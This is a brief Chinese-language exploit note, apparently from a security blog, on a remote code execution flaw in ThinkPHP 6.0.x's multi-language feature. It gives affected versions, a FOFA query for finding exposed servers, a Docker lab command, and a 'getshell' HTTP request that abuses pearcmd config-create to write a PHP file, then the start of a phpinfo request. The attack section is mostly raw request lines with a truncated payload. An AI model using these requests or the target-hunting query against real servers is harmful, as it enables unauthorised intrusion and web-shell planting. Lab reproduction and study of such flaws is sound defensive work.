Think PHP 多语言RCE
影响范围
本次漏洞影响范围如下:
1 | v6.0.1 < Thinkphp < v6.0.13 |
FOFA 语法:
1 | header="think_lang" |
要求:
1 | 1、需要Thinkphp开启多语言功能 |
复现环境:
1 | docker run -it -d -p 8080:80 vulfocus/thinkphp:6.0.12 |
getshell
1 | GET /public/index.php?+config-create+/<?= ;?>+/tmp/nihao2.php HTTP/1.1 |
phpinfo
1 | POST /public/index.php HTTP/1.1 |